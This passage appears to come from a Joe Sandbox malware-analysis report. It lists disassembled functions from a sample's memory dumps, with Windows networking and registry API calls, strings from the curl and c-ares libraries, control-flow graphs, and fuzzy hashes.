                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: ff3c62036edd43128a74fa7a630a0566c8192709c50b0b3e6cf3e9e03aca89f8
                                                              • Instruction ID: ecadfa5c6329743da7131765cdff8a81f8279371b51f4ddf341a569c30dd3d14
                                                              • Opcode Fuzzy Hash: ff3c62036edd43128a74fa7a630a0566c8192709c50b0b3e6cf3e9e03aca89f8
                                                              • Instruction Fuzzy Hash: C0C16F716053059FEB18DF28D884B6A7BE1BF88314F05C968E8499B3A2E731ED45DB81
                                                              Function 0057A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0056712E,?,?,?,00001001,00000000), ref: 0057A90D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                              • Instruction ID: a412551e074acf5ab1a947eacffadf24f988bb23b5752032f393030a08d5587f
                                                              • Opcode Fuzzy Hash: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                              • Instruction Fuzzy Hash: E1F06D75118308AFD2109F01EC88D6BBBEDFFC9754F05895DF94C132118270AE10DAB2
                                                              Function 0056A440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A499
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A4FB
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A531
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0056AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0056AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0056AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0056AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0056AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 0056AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0056AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0056AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0056AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 0056AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 0056ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 0056AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0056AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0056AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0056AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0056AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0056B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4281207131-1047472027
                                                              • Opcode ID: 311554f64cf0d8c3885da9313aaa294a0b2001f8e0ba7c6a374f38497261b565
                                                              • Instruction ID: 3742219d43596185b9d20ebfdc09d7b45dac6a66391927f2cd97ad28149e9505
                                                              • Opcode Fuzzy Hash: 311554f64cf0d8c3885da9313aaa294a0b2001f8e0ba7c6a374f38497261b565
                                                              • Instruction Fuzzy Hash: F4729FB1604341AFE720DB24DC85B6BBBE8BF85704F144928F985E72A2E771E944CB53
                                                              Function 004EA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 004EA832
                                                              Strings
                                                              • Trying [%s]:%d..., xrefs: 004EA689
                                                              • Bind to local port %d failed, trying next, xrefs: 004EAFE5
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 004EAE60
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 004EAE1F
                                                              • Could not set TCP_NODELAY: %s, xrefs: 004EA871
                                                              • @, xrefs: 004EAC42
                                                              • Local port: %hu, xrefs: 004EAF28
                                                              • bind failed with errno %d: %s, xrefs: 004EB080
                                                              • cf-socket.c, xrefs: 004EA5CD, 004EA735
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 004EA796
                                                              • @, xrefs: 004EA8F4
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 004EA6CE
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 004EADAC
                                                              • Trying %s:%d..., xrefs: 004EA7C2, 004EA7DE
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 004EAD0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: f38f91354390c65239385882d774b530d0c5d75755508c20877b0e6038c35a54
                                                              • Instruction ID: a3234e26dc7b71a69dd6054f2b06eeaf7de72d762fc0991a5675b1ad1fedcdb6
                                                              • Opcode Fuzzy Hash: f38f91354390c65239385882d774b530d0c5d75755508c20877b0e6038c35a54
                                                              • Instruction Fuzzy Hash: EF622371504381ABE720CF25CC46BABB7E4BF80309F04492EF98897292E775E855CB97
                                                              Function 00579740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 971 579740-57975b 972 579780-579782 971->972 973 57975d-579768 call 5778a0 971->973 975 579914-57994e call 838b70 RegOpenKeyExA 972->975 976 579788-5797a0 call 838e00 call 5778a0 972->976 981 57976e-579770 973->981 982 5799bb-5799c0 973->982 984 579950-579955 975->984 985 57995a-579992 RegQueryValueExA RegCloseKey call 838b98 975->985 976->982 986 5797a6-5797c5 976->986 981->986 987 579772-57977e 981->987 988 579a0c-579a15 982->988 984->988 999 579997-5799b5 call 5778a0 985->999 994 579827-579833 986->994 995 5797c7-5797e0 986->995 987->976 1000 579835-57985c call 56e2b0 * 2 994->1000 1001 57985f-579872 call 575ca0 994->1001 997 5797f6-579809 995->997 998 5797e2-5797f3 call 838b50 995->998 997->994 1011 57980b-579810 997->1011 998->997 999->982 999->986 1000->1001 1012 5799f0 1001->1012 1013 579878-57987d call 5777b0 1001->1013 1011->994 1016 579812-579822 1011->1016 1015 5799f5-5799fb call 575d00 1012->1015 1020 579882-579889 1013->1020 1025 5799fe-579a09 1015->1025 1016->988 1020->1015 1024 57988f-57989b call 564fe0 1020->1024 1024->1012 1029 5798a1-5798c3 call 838b50 call 5778a0 1024->1029 1025->988 1035 5799c2-5799ed call 56e2b0 * 2 1029->1035 1036 5798c9-5798db call 56e2d0 1029->1036 1035->1012 1036->1035 1040 5798e1-5798f0 call 56e2d0 1036->1040 1040->1035 1047 5798f6-579905 call 5763f0 1040->1047 1051 579f66-579f7f call 575d00 1047->1051 1052 57990b-57990f 1047->1052 1051->1025 1053 579a3f-579a5a call 576740 call 5763f0 1052->1053 1053->1051 1060 579a60-579a6e call 576d60 1053->1060 1063 579a70-579a94 call 576200 call 5767e0 call 576320 1060->1063 1064 579a1f-579a39 call 576840 call 5763f0 1060->1064 1075 579a16-579a19 1063->1075 1076 579a96-579ac6 call 56d120 1063->1076 1064->1051 1064->1053 1075->1064 1078 579fc1 1075->1078 1081 579ae1-579af7 call 56d190 1076->1081 1082 579ac8-579adb call 56d120 1076->1082 1080 579fc5-579ffd call 575d00 call 56e2b0 * 2 1078->1080 1080->1025 1081->1064 1090 579afd-579b09 call 564fe0 1081->1090 1082->1064 1082->1081 1090->1078 1096 579b0f-579b29 call 56e730 1090->1096 1100 579f84-579f88 1096->1100 1101 579b2f-579b3a call 5778a0 1096->1101 1104 579f95-579f99 1100->1104 1101->1100 1108 579b40-579b54 call 56e760 1101->1108 1106 579fa0-579fb6 call 56ebf0 * 2 1104->1106 1107 579f9b-579f9e 1104->1107 1118 579fb7-579fbe 1106->1118 1107->1078 1107->1106 1114 579f8a-579f92 1108->1114 1115 579b5a-579b6e call 56e730 1108->1115 1114->1104 1121 579b70-57a004 1115->1121 1122 579b8c-579b97 call 5763f0 1115->1122 1118->1078 1127 57a015-57a01d 1121->1127 1128 579b9d-579bbf call 576740 call 5763f0 1122->1128 1129 579c9a-579cab call 56ea00 1122->1129 1130 57a024-57a045 call 56ebf0 * 2 1127->1130 1131 57a01f-57a022 1127->1131 1128->1129 1148 579bc5-579bda call 576d60 1128->1148 1140 579f31-579f35 1129->1140 1141 579cb1-579ccd call 56ea00 call 56e960 1129->1141 1130->1080 1131->1080 1131->1130 1143 579f37-579f3a 1140->1143 1144 579f40-579f61 call 56ebf0 * 2 1140->1144 1159 579ccf 1141->1159 1160 579cfd-579d0e call 56e960 1141->1160 1143->1064 1143->1144 1144->1064 1148->1129 1158 579be0-579bf4 call 576200 call 5767e0 1148->1158 1158->1129 1179 579bfa-579c0b call 576320 1158->1179 1161 579cd1-579cec call 56e9f0 call 56e4a0 1159->1161 1169 579d53-579d55 1160->1169 1170 579d10 1160->1170 1180 579d47-579d51 1161->1180 1181 579cee-579cfb call 56e9d0 1161->1181 1173 579e69-579e8e call 56ea40 call 56e440 1169->1173 1174 579d12-579d2d call 56e9f0 call 56e4a0 1170->1174 1199 579e94-579eaa call 56e3c0 1173->1199 1200 579e90-579e92 1173->1200 1196 579d2f-579d3c call 56e9d0 1174->1196 1197 579d5a-579d6f call 56e960 1174->1197 1191 579b75-579b86 call 56ea00 1179->1191 1192 579c11-579c1c call 577b70 1179->1192 1186 579dca-579ddb call 56e960 1180->1186 1181->1160 1181->1161 1209 579e2e-579e36 1186->1209 1210 579ddd-579ddf 1186->1210 1191->1122 1218 579f2d 1191->1218 1192->1122 1213 579c22-579c33 call 56e960 1192->1213 1196->1174 1221 579d3e-579d42 1196->1221 1224 579dc2 1197->1224 1225 579d71-579d73 1197->1225 1228 579eb0-579eb1 1199->1228 1229 57a04a-57a04c 1199->1229 1206 579eb3-579ec4 call 56e9c0 1200->1206 1206->1064 1231 579eca-579ed0 1206->1231 1215 579e3d-579e5b call 56ebf0 * 2 1209->1215 1216 579e38-579e3b 1209->1216 1219 579e06-579e21 call 56e9f0 call 56e4a0 1210->1219 1240 579c66-579c75 call 5778a0 1213->1240 1241 579c35 1213->1241 1226 579e5e-579e67 1215->1226 1216->1215 1216->1226 1218->1140 1255 579e23-579e2c call 56eac0 1219->1255 1256 579de1-579dee call 56ec80 1219->1256 1221->1173 1224->1186 1236 579d9a-579db5 call 56e9f0 call 56e4a0 1225->1236 1226->1173 1226->1206 1228->1206 1234 57a057-57a070 call 56ebf0 * 2 1229->1234 1235 57a04e-57a051 1229->1235 1239 579ee5-579ef2 call 56e9f0 1231->1239 1234->1118 1235->1078 1235->1234 1269 579db7-579dc0 call 56eac0 1236->1269 1270 579d75-579d82 call 56ec80 1236->1270 1239->1064 1262 579ef8-579f0e call 56e440 1239->1262 1258 57a011 1240->1258 1259 579c7b-579c8f call 56e7c0 1240->1259 1248 579c37-579c51 call 56e9f0 1241->1248 1248->1122 1285 579c57-579c64 call 56e9d0 1248->1285 1273 579df1-579e04 call 56e960 1255->1273 1256->1273 1258->1127 1259->1122 1280 579c95-57a00e 1259->1280 1283 579ed2-579edf call 56e9e0 1262->1283 1284 579f10-579f26 call 56e3c0 1262->1284 1289 579d85-579d98 call 56e960 1269->1289 1270->1289 1273->1209 1273->1219 1280->1258 1283->1064 1283->1239 1284->1283 1297 579f28 1284->1297 1285->1240 1285->1248 1289->1224 1289->1236 1297->1078
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00579946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00579974
                                                              • RegCloseKey.KERNELBASE(?), ref: 0057998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                              • API String ID: 3677997916-615551945
                                                              • Opcode ID: ac319f2e8b5b4fc00f3934523f8e175d22c73d219a19b3e2c394fe39b2aedd41
                                                              • Instruction ID: 5f46e68ba9414b78bff055fd0a91b5d41f29177e26ba30fc7b1d41d85173337c
                                                              • Opcode Fuzzy Hash: ac319f2e8b5b4fc00f3934523f8e175d22c73d219a19b3e2c394fe39b2aedd41
                                                              • Instruction Fuzzy Hash: FC3297B59052025BEB11AB24FC46A1B7EA5BF95314F088834F90D97263F731ED14E7A3
                                                              Function 004E8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1299 4e8b50-4e8b69 1300 4e8b6b-4e8b74 1299->1300 1301 4e8be6 1299->1301 1303 4e8beb-4e8bf2 1300->1303 1304 4e8b76-4e8b8d 1300->1304 1302 4e8be9 1301->1302 1302->1303 1305 4e8b8f-4e8ba7 call 4c6e40 1304->1305 1306 4e8bf3-4e8bfe call 4ea550 1304->1306 1313 4e8bad-4e8baf 1305->1313 1314 4e8cd9-4e8d16 SleepEx getsockopt 1305->1314 1311 4e8de4-4e8def 1306->1311 1312 4e8c04-4e8c08 1306->1312 1317 4e8e8c-4e8e95 1311->1317 1318 4e8df5-4e8e19 call 4ea150 1311->1318 1319 4e8c0e-4e8c1d 1312->1319 1320 4e8dbd-4e8dc3 1312->1320 1321 4e8ca6-4e8cb0 1313->1321 1322 4e8bb5-4e8bb9 1313->1322 1315 4e8d18-4e8d20 1314->1315 1316 4e8d22 1314->1316 1323 4e8d26-4e8d39 1315->1323 1316->1323 1324 4e8e97-4e8e9c 1317->1324 1325 4e8f00-4e8f06 1317->1325 1359 4e8e1b-4e8e26 1318->1359 1360 4e8e88 1318->1360 1327 4e8c1f-4e8c30 connect 1319->1327 1328 4e8c35-4e8c48 call 4ea150 1319->1328 1320->1302 1321->1314 1329 4e8cb2-4e8cb8 1321->1329 1322->1303 1330 4e8bbb-4e8bc2 1322->1330 1332 4e8d3b-4e8d3d 1323->1332 1333 4e8d43-4e8d61 call 4cd8c0 call 4ea150 1323->1333 1334 4e8e9e-4e8eb6 call 4c2a00 1324->1334 1335 4e8edf-4e8eef call 4b78b0 1324->1335 1325->1303 1327->1328 1354 4e8c4d-4e8c4f 1328->1354 1337 4e8cbe-4e8cd4 call 4eb180 1329->1337 1338 4e8ddc-4e8dde 1329->1338 1330->1303 1339 4e8bc4-4e8bcc 1330->1339 1332->1333 1332->1338 1366 4e8d66-4e8d74 1333->1366 1334->1335 1358 4e8eb8-4e8edd call 4c3410 * 2 1334->1358 1356 4e8ef2-4e8efc 1335->1356 1337->1311 1338->1302 1338->1311 1340 4e8bce-4e8bd2 1339->1340 1341 4e8bd4-4e8bda 1339->1341 1340->1303 1340->1341 1341->1303 1347 4e8bdc-4e8be1 1341->1347 1355 4e8dac-4e8db8 call 4f50a0 1347->1355 1363 4e8c8e-4e8c93 1354->1363 1364 4e8c51-4e8c58 1354->1364 1355->1303 1356->1325 1358->1356 1361 4e8e2e-4e8e85 call 4cd090 call 4f4fd0 1359->1361 1362 4e8e28-4e8e2c 1359->1362 1360->1317 1361->1360 1362->1360 1362->1361 1371 4e8dc8-4e8dd9 call 4eb100 1363->1371 1372 4e8c99-4e8c9f 1363->1372 1364->1363 1369 4e8c5a-4e8c62 1364->1369 1366->1303 1373 4e8d7a-4e8d81 1366->1373 1376 4e8c6a-4e8c70 1369->1376 1377 4e8c64-4e8c68 1369->1377 1371->1338 1372->1321 1373->1303 1379 4e8d87-4e8d8f 1373->1379 1376->1363 1382 4e8c72-4e8c8b call 4f50a0 1376->1382 1377->1363 1377->1376 1384 4e8d9b-4e8da1 1379->1384 1385 4e8d91-4e8d95 1379->1385 1382->1363 1384->1303 1386 4e8da7 1384->1386 1385->1303 1385->1384 1386->1355
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 004E8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 004E8CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 004E8D0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: 8d6202968f86a8674a1d9505dde625f57a2713137a5139ee379a4d0f428742f1
                                                              • Instruction ID: 8bc2d12c6c4e4b9fc1c368be105bd357043863bad2d74b599f80f8eeb18bd38d
